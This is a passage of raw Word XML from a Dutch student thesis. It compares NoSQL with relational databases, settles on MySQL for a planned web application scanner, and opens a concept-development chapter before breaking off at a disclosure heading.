      <w:r w:rsidR="00844C28">
        <w:t>zeer schaalbaar</w:t>
      </w:r>
      <w:r w:rsidR="00FC6D67">
        <w:t xml:space="preserve"> moeten zijn</w:t>
      </w:r>
      <w:r w:rsidR="00C109D8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005569F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A17E3A7" w14:textId="65B66CBB" w:rsidR="00EE1C30" w:rsidRDefault="007F6B5B">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>NOSQL databases</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zijn makkelijker te beheren vanwege hun simpele data model structuur, dit verlaagd de administratie en configuratie eisen</w:t>
      </w:r>
      <w:r w:rsidR="00D71B65">
        <w:t xml:space="preserve"> van een DBMS en dat verlaagd weer de onderhoud kosten.</w:t>
      </w:r>
      <w:r w:rsidR="000254ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F6F32D" w14:textId="77777777" w:rsidR="006D6637" w:rsidRDefault="000254ED">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>NOSQL databases</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hebben veel minder restricties dan rationele databases. Door de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>key-value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> structuur dat in documenten worden opgeslagen</w:t>
      </w:r>
      <w:r w:rsidR="000C03E5">
        <w:t xml:space="preserve"> in de database,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zorgt ervoor dat </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>web applicaties</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C03E5">
        <w:t>virtueel met elke data structuur kunnen werken.</w:t>
      </w:r>
      <w:r w:rsidR="006D6637">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22761E19" w14:textId="35ED141E" w:rsidR="000254ED" w:rsidRPr="00CC4DB8" w:rsidRDefault="000C03E5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00461740">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Samengevat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4061C757" w14:textId="63D61D3E" w:rsidR="00983595" w:rsidRDefault="001A2D6C">
      <w:r>
        <w:t xml:space="preserve">Als een systeem </w:t>
      </w:r>
      <w:r w:rsidR="00C239D9">
        <w:t>schaalbaar moet zijn,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C239D9">
        <w:t xml:space="preserve">een </w:t>
      </w:r>
      <w:r>
        <w:t>groot hoeveelheid data moet verwerken waarvan de structuur niet vooraf gedefinieerd kan worden</w:t>
      </w:r>
      <w:r w:rsidR="00C239D9">
        <w:t xml:space="preserve"> en het onderhouden van een RDBMS financieel niet mogelijk is </w:t>
      </w:r>
      <w:r w:rsidR="005C010E">
        <w:t xml:space="preserve">dan biedt </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>NOSQL database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> een geschikte oplossing</w:t>
      </w:r>
      <w:r w:rsidR="002B5C92">
        <w:t xml:space="preserve"> voor het probleem</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005C010E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C239D9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724F334D" w14:textId="4642E6DF" w:rsidR="00983595" w:rsidRPr="00461740" w:rsidRDefault="00461740">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461740">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conclusie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30774419" w14:textId="6CCC6421" w:rsidR="00983595" w:rsidRDefault="004F3CD7">
      <w:r>
        <w:t xml:space="preserve">Met </w:t>
      </w:r>
      <w:r w:rsidR="00EF23FF">
        <w:t xml:space="preserve">betrekking tot </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EF23FF">
        <w:t>het</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EF23FF">
        <w:t xml:space="preserve"> projectcontext kan ik stellen dat NOSQL niet geschikt is voor het software systeem die ik ga ontwikke</w:t>
      </w:r>
      <w:r w:rsidR="0064563F">
        <w:t xml:space="preserve">len voor mijn afstudeerproject. De systeemeisen van de </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="0064563F">
        <w:t xml:space="preserve"> met betrekking tot de database komen niet overeen met wat een NOSQL kenmerkt</w:t>
      </w:r>
      <w:r w:rsidR="000A53AB">
        <w:t>, op een aantal zaken na</w:t>
      </w:r>
      <w:r w:rsidR="0064563F">
        <w:t xml:space="preserve">. De database heeft een vooraf gedefinieerde </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0064563F">
        <w:t>data structuur</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0064563F">
        <w:t>, het maakt gebruik van integriteitsregels en entiteit relaties.</w:t>
      </w:r>
      <w:r w:rsidR="000A53AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008228D8">
        <w:t xml:space="preserve">De zaken die wel overeenkomen zijn: grote hoeveelheid data dat verwerkt moet worden en, vanwege de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008228D8">
        <w:t>modulariteit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008228D8">
        <w:t xml:space="preserve"> van het systeem is de schaalba</w:t>
      </w:r>
      <w:r w:rsidR="0078170D">
        <w:t xml:space="preserve">arheid </w:t>
      </w:r>
      <w:r w:rsidR="007311C9">
        <w:t xml:space="preserve">van een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007311C9">
        <w:t>NOSQL database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007311C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0078170D">
        <w:t>ook een belangrijk</w:t>
      </w:r>
      <w:r w:rsidR="007311C9">
        <w:t xml:space="preserve"> kenmerk. </w:t>
      </w:r>
      <w:r w:rsidR="0078170D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0064563F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CB3922" w14:textId="3CA2D252" w:rsidR="001C071B" w:rsidRDefault="001C071B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00394FB6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DBMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEAD58D" w14:textId="081B9FD4" w:rsidR="00362B16" w:rsidRDefault="008D09F3">
      <w:r>
        <w:t xml:space="preserve">In de voorgaande deel heb ik mijn keuze laten vallen op de relationele DBMS. </w:t>
      </w:r>
      <w:r w:rsidR="00440C91">
        <w:t>Wat er nu overblijft voor dit deelonderzoek is het vinden van een geschikte DBM</w:t>
      </w:r>
      <w:r w:rsidR="00B8386B">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00440C91">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B8386B">
        <w:t xml:space="preserve"> Ik zal enkel kijken naar open source </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B8386B">
        <w:t>database systemen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B8386B">
        <w:t xml:space="preserve"> dus die van Microsoft en IBM vallen al af. Dit zijn tevens ook de twee grootste leveranciers van DBMS </w:t>
      </w:r>
      <w:r w:rsidR="00863A50">
        <w:t xml:space="preserve">op Oracle na die naast een commerciële versie, ook </w:t>
      </w:r>
      <w:r w:rsidR="00536984">
        <w:t>een open source versie aanbiedt (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00536984">
        <w:t>MySQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00536984">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00863A50">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F95A6B">
        <w:t xml:space="preserve"> Ik heb in het verleden alleen met één RDBMS</w:t>
      </w:r>
      <w:r w:rsidR="00E22301">
        <w:t xml:space="preserve"> gewerkt</w:t>
      </w:r>
      <w:r w:rsidR="00F95A6B">
        <w:t xml:space="preserve">, en dat is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F95A6B">
        <w:t>MySQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F95A6B">
        <w:t xml:space="preserve">. Deze heeft twee versies de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F95A6B">
        <w:t>web versie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F95A6B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F95A6B">
        <w:t>phpMyAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F95A6B">
        <w:t xml:space="preserve"> en voor Desktop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F95A6B">
        <w:t>MySQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F95A6B">
        <w:t xml:space="preserve"> Workbench. </w:t>
      </w:r>
      <w:r w:rsidR="0063240E">
        <w:t>Deze is het meest gangbare en meest populaire</w:t>
      </w:r>
      <w:r w:rsidR="0018711F">
        <w:t xml:space="preserve"> als het gaat om open so</w:t>
      </w:r>
      <w:r w:rsidR="009211A6">
        <w:t>urce database applicaties.</w:t>
      </w:r>
      <w:r w:rsidR="006C0112">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C0112">
        <w:t>MySQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C0112">
        <w:t xml:space="preserve"> is voor grootschalige database servers ideaal en heeft veel features en een goed support community. Het heeft een lage leercurve en is relatief makkelijk te implementeren in een ontwikkelomgeving zoals </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C0112">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C0112">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002C610E">
        <w:t>Er zijn een aantal andere databasemanagementsystemen die open source zijn maar, in dit geval hoef ik niet verder te zoeken omdat dit al een geschikte</w:t>
      </w:r>
      <w:r w:rsidR="00EE1974">
        <w:t xml:space="preserve"> optie is voor mijn </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="002C610E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A38326D" w14:textId="77777777" w:rsidR="00362B16" w:rsidRPr="001A1A4B" w:rsidRDefault="00362B16" w:rsidP="00362B16">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006176AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Database afhankelijkheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F37F20" w14:textId="77777777" w:rsidR="00362B16" w:rsidRDefault="00362B16" w:rsidP="00362B16">
      <w:r>
        <w:t xml:space="preserve">Ik zal voor de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Proof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of Concept de applicatie afhankelijk maken van een database om het ontwikkelproces te versimpelen. Dit is een bewuste keuze, in een andere situatie zou ik een cache gebruiken die na het scan proces het rapport genereerd en verstuurd en pas daarna controleert of er gebruik gemaakt wordt van een database. Zo is de applicatie niet meer afhankelijk van een database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF6795C" w14:textId="0E0F40DE" w:rsidR="00F95A6B" w:rsidRPr="00F95A6B" w:rsidRDefault="00F95A6B">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29948355" w14:textId="326B0047" w:rsidR="00B47A25" w:rsidRPr="00207D1F" w:rsidRDefault="00E81226">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Samenvatting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7127ED84" w14:textId="5AD04444" w:rsidR="000F2028" w:rsidRDefault="001F7F36">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251792384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7419C555" wp14:editId="3DEB61E4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2071370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2341880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1047750" cy="2171700"/>
                <wp:effectExtent l="0" t="0" r="19050" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21726"/>
                    <wp:lineTo x="21469" y="21726"/>
                    <wp:lineTo x="21469" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="506" name="Rectangle 506"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1047750" cy="21717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CFAF5EA" id="Rectangle 506" o:spid="_x0000_s1026" style="position:absolute;margin-left:163.1pt;margin-top:184.4pt;width:82.5pt;height:171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Y7uUaECAADUBQAADgAAAGRycy9lMm9Eb2MueG1srFTBbtswDL0P2D8Iuq+2s6TpgjpF0KLDgKIN&#10;2g49K7IUG5BFTVLiZF8/SnKcrOuGYVgOiiiSj+QzycurXavIVljXgC5pcZZTIjSHqtHrkn59vv1w&#10;QYnzTFdMgRYl3QtHr+bv3112ZiZGUIOqhCUIot2sMyWtvTezLHO8Fi1zZ2CERqUE2zKPol1nlWUd&#10;orcqG+X5edaBrYwFLpzD15ukpPOIL6Xg/kFKJzxRJcXcfDxtPFfhzOaXbLa2zNQN79Ng/5BFyxqN&#10;QQeoG+YZ2djmF6i24RYcSH/Goc1AyoaLWANWU+SvqnmqmRGxFiTHmYEm9/9g+f12aUlTlXSSn1Oi&#10;WYsf6RFpY3qtBAmPSFFn3Awtn8zS9pLDa6h3J20b/rESsou07gdaxc4Tjo9FPp5OJ8g+R92omBbT&#10;PBKfHd2Ndf6zgJaES0ktJhDpZNs75zEkmh5MQjQHqqluG6WiEHpFXCtLtgy/8mo9Sq7K1Cw9fczx&#10;F+pAmNhZwTpJp0BK/w12D3N0RNDgmQWSEi3x5vdKBDylH4VEhpGIlNiQQUqOcS60L2LOrmaVSM+T&#10;3+YcAQOyRAIG7B7gZy4O2Cnn3j64ijgag3Oeov/JefCIkUH7wbltNNi3ABRW1UdO9geSEjWBpRVU&#10;e+w/C2kwneG3DXbAHXN+ySxOInYNbhf/gIdU0JUU+hslNdjvb70HexwQ1FLS4WSX1H3bMCsoUV80&#10;js6nYjwOqyAK48l0hII91axONXrTXgO2VYF7zPB4DfZeHa7SQvuCS2gRoqKKaY6xS8q9PQjXPm0c&#10;XGNcLBbRDMffMH+nnwwP4IHV0OHPuxdmTT8GHifoHg5bgM1eTUOyDZ4aFhsPsomjcuS15xtXR2z2&#10;fs2F3XQqR6vjMp7/AAAA//8DAFBLAwQUAAYACAAAACEAaqhxyOAAAAALAQAADwAAAGRycy9kb3du&#10;cmV2LnhtbEyPQU/DMAyF70j8h8hI3FjaAqWUphMgwQVx2NjgmjWmrUic0qRb9+8xJ7jZfk/P36uW&#10;s7Nij2PoPSlIFwkIpMabnloFm7eniwJEiJqMtp5QwREDLOvTk0qXxh9ohft1bAWHUCi1gi7GoZQy&#10;NB06HRZ+QGLt049OR17HVppRHzjcWZklSS6d7ok/dHrAxw6br/XkFDTF60t4mKetfUbU2ce1+z6u&#10;3pU6P5vv70BEnOOfGX7xGR1qZtr5iUwQVsFllmds5SEvuAM7rm5TvuwU3KRJAbKu5P8O9Q8AAAD/&#10;/wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50&#10;X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAA&#10;X3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA8Y7uUaECAADUBQAADgAAAAAAAAAAAAAAAAAsAgAA&#10;ZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAaqhxyOAAAAALAQAADwAAAAAAAAAAAAAAAAD5&#10;BAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAAYGAAAAAA==&#10;" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt">
                <v:fill opacity="19789f"/>
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251791360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4CAB1288" wp14:editId="589BD6F2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>393700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1308100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4367530" cy="3261360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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367530" cy="3261360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="000F2028">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF81CAE" w14:textId="66558A47" w:rsidR="00940598" w:rsidRDefault="0026508E" w:rsidP="00BA2E92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc491022078"/>
      <w:r w:rsidRPr="0026508E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidR="00940598" w:rsidRPr="0026508E">
        <w:t>Concept ontwikkeling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="6F1AD31A" w14:textId="0D5D03CF" w:rsidR="0061407B" w:rsidRPr="0026508E" w:rsidRDefault="0061407B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F91F4F8" wp14:editId="573A9ED9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-43815</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>107950</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3543300" cy="567690"/>
                <wp:effectExtent l="0" t="0" r="38100" b="16510"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="17" name="Text Box 17"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3543300" cy="5676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FC4062" w14:textId="569B649E" w:rsidR="00CE4BB5" w:rsidRPr="008F0D13" w:rsidRDefault="00CE4BB5" w:rsidP="002C3ACE">
                            <w:r w:rsidRPr="008F0D13">
                              <w:t>Deelvraag</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5A2B5FC7" w14:textId="632D2AB8" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00CA4BC9">
                            <w:r>
                              <w:t>Hoe ziet het concept eruit van de webapplicatie scanner?</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="226FD3BF" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00CA4BC9" w:rsidRDefault="00CE4BB5" w:rsidP="002C3A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1F4F8" id="Text Box 17" o:spid="_x0000_s1057" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-3.45pt;margin-top:8.5pt;width:279pt;height:44.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pjEDogCAACLBQAADgAAAGRycy9lMm9Eb2MueG1srFRLTxsxEL5X6n+wfC+bhAAlYoNSEFUlBKih&#10;4ux4bbKq1+PaTrLpr+9nbzZElAtVL7vjmW/ej4vLtjFsrXyoyZZ8eDTgTFlJVW2fS/7j8ebTZ85C&#10;FLYShqwq+VYFfjn9+OFi4yZqREsylfIMRmyYbFzJlzG6SVEEuVSNCEfklIVQk29ExNM/F5UXG1hv&#10;TDEaDE6LDfnKeZIqBHCvOyGfZvtaKxnvtQ4qMlNyxBbz1+fvIn2L6YWYPHvhlrXchSH+IYpG1BZO&#10;96auRRRs5eu/TDW19BRIxyNJTUFa11LlHJDNcPAqm/lSOJVzQXGC25cp/D+z8m794FldoXdnnFnR&#10;oEePqo3sC7UMLNRn48IEsLkDMLbgA9vzA5gp7Vb7Jv2REIMcld7uq5usSTCPT8bHxwOIJGQnp2en&#10;57n8xYu28yF+VdSwRJTco3u5qGJ9GyIiAbSHJGeWbmpjcgeNTYxApq4SLz/SCKkr49laoPmxzUHD&#10;xAEKr05T5VHZeUkJd4llKm6NSgaN/a40SpXze8ODkFLZ2HvJ6ITSiOc9ijt8Uu2ieo/yXiN7Jhv3&#10;yk1tyedq5t16KUz1sw9Zd3jU+SDvRMZ20eYZGY37xi+o2mIePHUbFZy8qdG0WxHig/BYIfQZZyHe&#10;46MNbUpOO4qzJfnfb/ETHpMNKWcbrGTJw6+V8Ioz881i5s+H43Ha4fwYn5yN8PCHksWhxK6aK0Lj&#10;hzhATmYy4aPpSe2pecL1mCWvEAkr4RuT0pNXsTsUuD5SzWYZhK11It7auZPJdCpzGsnH9kl4t5vb&#10;iIm/o355xeTV+HbYpGlptoqk6zzbqdBdVXcNwMbnkd9dp3RSDt8Z9XJDp38AAAD//wMAUEsDBBQA&#10;BgAIAAAAIQD/6VUC4AAAAAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BbsIwEETvlfoP1lbqDZxU&#10;JbRpHERBSBWCA1ChHk28TSLidRQbCH/f5VSOOzOafZNNetuIM3a+dqQgHkYgkApnaioVfO8WgzcQ&#10;PmgyunGECq7oYZI/PmQ6Ne5CGzxvQym4hHyqFVQhtKmUvqjQaj90LRJ7v66zOvDZldJ0+sLltpEv&#10;UZRIq2viD5VucVZhcdyerIKv3XW5Gc/WiV1+zn9We+n3i/lKqeenfvoBImAf/sNww2d0yJnp4E5k&#10;vGgUDJJ3TrI+5knsj0ZxDOLAQpS8gswzeb8g/wMAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsA&#10;AADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAA&#10;IQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAA&#10;IQDamMQOiAIAAIsFAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI&#10;AAAAIQD/6VUC4AAAAAkBAAAPAAAAAAAAAAAAAAAAAOAEAABkcnMvZG93bnJldi54bWxQSwUGAAAA&#10;AAQABADzAAAA7QUAAAAA&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="68FC4062" w14:textId="569B649E" w:rsidR="00CE4BB5" w:rsidRPr="008F0D13" w:rsidRDefault="00CE4BB5" w:rsidP="002C3ACE">
                      <w:r w:rsidRPr="008F0D13">
                        <w:t>Deelvraag</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5A2B5FC7" w14:textId="632D2AB8" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00CA4BC9">
                      <w:r>
                        <w:t>Hoe ziet het concept eruit van de webapplicatie scanner?</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="226FD3BF" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00CA4BC9" w:rsidRDefault="00CE4BB5" w:rsidP="002C3ACE"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5895953D" w14:textId="77777777" w:rsidR="0061407B" w:rsidRDefault="0061407B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C724CF" w14:textId="77777777" w:rsidR="00F35D5A" w:rsidRDefault="00F35D5A" w:rsidP="00045449">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="243845A0" w14:textId="2BAD7DFD" w:rsidR="00045449" w:rsidRPr="00C603E8" w:rsidRDefault="00045449" w:rsidP="00045449">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C603E8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Disclosure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DD3D71B" w14:textId="6F915B39" w:rsidR="00045449" w:rsidRDefault="00045449" w:rsidP="00045449">
      <w:r>
        <w:t xml:space="preserve">Voor ik begin aan het concept documentatie wil ik melden dat ik geen </w:t>
      </w:r>
